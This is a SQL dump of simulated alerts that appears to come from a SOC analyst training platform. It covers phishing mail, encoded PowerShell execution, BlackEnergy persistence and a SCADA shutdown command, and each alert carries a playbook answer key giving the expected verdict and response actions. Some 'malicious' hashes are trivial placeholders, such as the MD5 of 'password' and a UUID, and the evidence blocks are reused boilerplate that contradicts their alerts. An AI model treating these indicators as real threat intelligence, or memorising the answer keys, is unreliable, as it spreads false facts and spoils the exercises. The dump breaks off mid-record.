(256, 'Suspicious Email Link Detected', 'medium', 'Email Gateway', 'An email containing a potentially harmful link was detected. The link is known to redirect users to phishing sites previously associated with credential harvesting campaigns.', 'Phishing Attempt', 'T1566.001', 1, 'Closed', 54, '{\"timestamp\":\"2023-10-15T08:54:23Z\",\"email_id\":\"ae56d7f3-8496-439b-9077-41795bdee04b\",\"source_email\":\"alerts@banking-security.com\",\"destination_email\":\"johndoe@example.com\",\"subject\":\"Important: Account Verification Needed\",\"link\":\"http://secure-account-login.com/verify\",\"link_status\":\"Blacklisted\",\"detection_method\":\"URL Reputation Check\",\"actions_taken\":\"Email Quarantine\",\"headers\":{\"Received\":\"by mailserver.example.com with SMTP id abc123456 for johndoe@example.com\",\"From\":\"<alerts@banking-security.com>\",\"To\":\"<johndoe@example.com>\",\"Subject\":\"Important: Account Verification Needed\",\"Date\":\"15 Oct 2023 08:54:21 +0000\"},\"body\":\"Dear customer, your account requires verification. Click the link to secure your account: http://secure-account-login.com/verify\"}', '2025-12-29 05:31:26', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"security@secure-google.ru\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation\",\"verdict\":\"malicious\",\"details\":\"Sender domain is 3 days old and associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"secure-google.ru\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"53/94 security vendors flagged this domain as malicious.\"}}],\"expected_actions\":[\"block_sender\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\"}', 'Beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Link Detected\",\"date\":\"2026-02-01T20:32:18.853Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(257, 'Suspicious PowerShell Script Execution Detected', 'medium', 'process', 'A PowerShell script was executed which is commonly used in fileless malware attacks. The script attempted network communication with a known malicious IP.', 'Malicious Script Execution', 'T1059.001', 1, 'Closed', 54, '{\"timestamp\":\"2023-10-24T15:45:32Z\",\"event_id\":\"4674\",\"hostname\":\"DESKTOP-WX321\",\"username\":\"JohnDoe\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"cmdline\":\"powershell -NoProfile -ExecutionPolicy Bypass -File \\\"C:\\\\Users\\\\JohnDoe\\\\AppData\\\\Local\\\\Temp\\\\script.ps1\\\"\",\"file_hash\":\"3efd49ddfee84548bede1e13c4433b29f1db3f1d9b7f95c42e0b5cda1844afb0\",\"network_communication\":{\"src_ip\":\"192.168.1.10\",\"dest_ip\":\"203.0.113.45\",\"dest_port\":443,\"protocol\":\"HTTPS\"},\"detection_engine\":\"Signature-based\",\"signature_id\":\"POWERSHELL-0012\",\"additional_info\":\"The destination IP is associated with known C2 servers.\"}', '2025-12-29 05:44:17', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"56.201.107.90\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 56.201.107.90 reported 310 times for malicious activity. Abuse confidence score: 89%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service_account\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"suspicious_activity\"}', 'Beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(259, 'Suspicious PowerShell Execution Detected on Internal Host', 'high', 'CrowdStrike', 'A PowerShell script with obfuscated content was executed on an internal host. The script was used to download and execute a known malicious payload.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2023-11-01T14:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"CORP-WKS-0123\",\"file_hash\":\"3b1f2e1a2f8b9f7c6d4e5b3a2c5d6e7f\",\"domain\":\"malicious-example.com\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -EncodedCommand YABhAHMAaAAgAC0AZQAgACcAMwBiADEAZgAyAGUAMQBhADIAZgA4AGIAOQBmADcAYwA2AGQANABlADUAYgAzAGEAMgBjADUAZABlADcAZgAnAA==\"}', '2025-12-30 01:27:50', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address associated with host CORP-WKS-0123.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for hosting malicious content.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b1f2e1a2f8b9f7c6d4e5b3a2c5d6e7f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in multiple malware samples.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"malicious-example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain involved in distributing malware.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of obfuscated PowerShell commands, a malicious file hash, and connections to a known malicious IP and domain confirm this as a malware attack.\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(268, 'Phishing Email Detected', 'medium', 'Email Gateway', 'Employees report suspicious emails that appear to be from a trusted partner. Analysis of the email gateway logs reveals a phishing attempt with malicious attachments disguised as urgent documents.', 'Phishing', 'T1566.001', 1, 'Closed', 34, '{\"timestamp\":\"2023-10-08T14:23:45Z\",\"email_id\":\"abc123@example.com\",\"from\":\"partner.support@trustedpartner.com\",\"to\":\"employee@corporate.com\",\"subject\":\"Urgent: Action Required\",\"attachment\":\"urgent_document.pdf\",\"attachment_hash\":\"3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\",\"source_ip\":\"192.168.1.100\",\"destination_ip\":\"10.0.0.15\",\"external_ip\":\"203.0.113.45\"}', '2025-12-31 13:10:04', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"abc123@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Gateway Logs\",\"verdict\":\"suspicious\",\"details\":\"Unusual email activity detected.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware detected in attachment.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected\",\"date\":\"2026-02-01T20:32:18.857Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(269, 'BlackEnergy Malware Execution', 'high', 'EDR', 'After a user opens the malicious attachment, BlackEnergy malware is executed, providing the attackers with a foothold in the network. Endpoint Detection and Response (EDR) alerts on suspicious process activity linked to known malware signatures.', 'Malware', 'T1203: Exploitation for Client Execution', 1, 'Closed', 34, '{\"timestamp\":\"2023-10-05T14:23:11Z\",\"event_id\":\"987654321\",\"hostname\":\"CORP-ENDPOINT-23\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.50\",\"username\":\"jdoe\",\"malware_name\":\"BlackEnergy\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\Downloads\\\\invoice.doc\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"process_name\":\"word.exe\",\"process_id\":4321,\"alert_signature\":\"BlackEnergy Malware Execution\"}', '2025-12-31 13:10:04', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with BlackEnergy campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known BlackEnergy malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"invoice.doc\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used in phishing campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user within the organization.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(270, 'Persistence Mechanism Established', 'high', 'EDR', 'The attackers have used BlackEnergy malware to establish persistence on the target system. This was achieved through registry modifications and the creation of scheduled tasks, which were detected as anomalies in system configurations by the EDR.', 'Persistence', 'T1053: Scheduled Task/Job, T1112: Modify Registry', 1, 'Closed', 34, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"persistence\",\"host_ip\":\"10.0.1.15\",\"external_ip\":\"203.0.113.45\",\"process_name\":\"schtasks.exe\",\"user\":\"compromised_user\",\"registry_key\":\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\BlackEnergy\",\"scheduled_task\":\"BlackEnergy Task\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\",\"file_hash\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\"}', '2025-12-31 13:10:04', '2026-02-18 07:24:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network_check\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash matches known BlackEnergy variant.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"malicious\",\"details\":\"File associated with unauthorized persistence mechanism.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_user_audit\",\"verdict\":\"suspicious\",\"details\":\"User account used in unauthorized actions.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(271, 'Lateral Movement to OT Network', 'high', 'Network Monitoring Solution', 'Network monitoring solutions detect unusual lateral movement between the IT and OT networks, indicating the attackers are attempting to access the SCADA systems controlling the power grid. A suspicious connection attempt from an internal IT network to the OT network was observed using a compromised user account.', 'Lateral Movement', 'T1071.001', 1, 'Closed', 169, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"10.0.0.5\",\"username\":\"jdoe\",\"event_type\":\"connection_attempt\",\"protocol\":\"SMB\",\"file_accessed\":\"\\\\\\\\OT-SERVER\\\\SCADA\\\\config.dat\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"external_attacker_ip\":\"203.0.113.55\",\"connection_status\":\"failed\",\"reason\":\"Unauthorized access attempt detected\"}', '2025-12-31 13:10:04', '2026-02-18 07:26:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address from IT network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address from OT network\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Compromised user account attempting lateral movement\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malicious hash associated with credential dumping tool\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous cyber attacks targeting critical infrastructure\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(272, 'SCADA System Compromise', 'critical', 'SCADA Logs', 'Unauthorized command executions detected on SCADA systems, coinciding with a power outage. The attackers issued commands to disrupt power distribution, leading to a blackout.', 'Execution', 'T0811', 1, 'Closed', 169, '{\"timestamp\":\"2023-10-15T02:45:12Z\",\"system_id\":\"SCADA-CTRL-01\",\"event_type\":\"command_execution\",\"user\":\"unauthorized_user\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.20\",\"command_executed\":\"shutdown -h now\",\"external_attacker_ip\":\"203.0.113.45\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"malicious_script.sh\"}', '2025-12-31 13:10:04', '2026-02-18 07:27:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network scan\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence feed\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP involved in previous SCADA attacks\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious script used in SCADA disruptions\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_script.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"file analysis\",\"verdict\":\"malicious\",\"details\":\"Script designed to disrupt power distribution systems\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"unauthorized_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"user audit logs\",\"verdict\":\"suspicious\",\"details\":\"User account used without authorization\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.875Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:45:12Z\\\",\\\"system_id\\\":\\\"SCADA-CTRL-01\\\",\\\"event_type\\\":\\\"command_execution\\\",\\\"user\\\":\\\"unauthorized_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"10.0.0.20\\\",\\\"command_executed\\\":\\\"shutdown -h now\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_script.sh\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.875Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:45:12Z\\\",\\\"system_id\\\":\\\"SCADA-CTRL-01\\\",\\\"event_type\\\":\\\"command_execution\\\",\\\"user\\\":\\\"unauthorized_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"10.0.0.20\\\",\\\"command_executed\\\":\\\"shutdown -h now\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_script.sh\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.875Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:45:12Z\\\",\\\"system_id\\\":\\\"SCADA-CTRL-01\\\",\\\"event_type\\\":\\\"command_execution\\\",\\\"user\\\":\\\"unauthorized_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"10.0.0.20\\\",\\\"command_executed\\\":\\\"shutdown -h now\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_script.sh\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.875Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:45:12Z\\\",\\\"system_id\\\":\\\"SCADA-CTRL-01\\\",\\\"event_type\\\":\\\"command_execution\\\",\\\"user\\\":\\\"unauthorized_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"10.0.0.20\\\",\\\"command_executed\\\":\\\"shutdown -h now\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_script.sh\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.875Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:45:12Z\\\",\\\"system_id\\\":\\\"SCADA-CTRL-01\\\",\\\"event_type\\\":\\\"command_execution\\\",\\\"user\\\":\\\"unauthorized_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"10.0.0.20\\\",\\\"command_executed\\\":\\\"shutdown -h now\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_script.sh\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(273, 'Malware Detected: Suspicious Process Execution on Host', 'high', 'CrowdStrike', 'A suspicious process \'malware.exe\' was executed on the host \'INTERNAL-PC01\' originating from an external IP known for malicious activity. The hash of the file matches a known malware sample.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-11T14:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.5\",\"username\":\"jdoe\",\"hostname\":\"INTERNAL-PC01\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"process_name\":\"malware.exe\"}', '2025-12-31 13:30:07', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample \'Trojan.Generic\'\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The alert is a true positive as the process executed matches a known malware signature and originates from a malicious IP. Immediate action is required to contain the threat.\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 